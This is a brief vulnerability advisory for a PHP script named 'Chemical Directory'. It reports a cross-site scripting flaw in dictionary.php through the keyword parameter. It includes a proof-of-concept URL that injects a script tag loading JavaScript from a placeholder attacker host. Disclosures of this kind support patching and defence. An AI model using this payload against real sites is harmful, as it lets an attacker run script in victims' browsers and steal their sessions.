Chemical Directory v.unknown (doesnt say on website) Homepage: http://www.scriptsez.net/ Effected files: dictionary.php XSS Vulnerability via keyword variable: http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT SRC=http://evilsite.com/xss.js][/SCRIPT]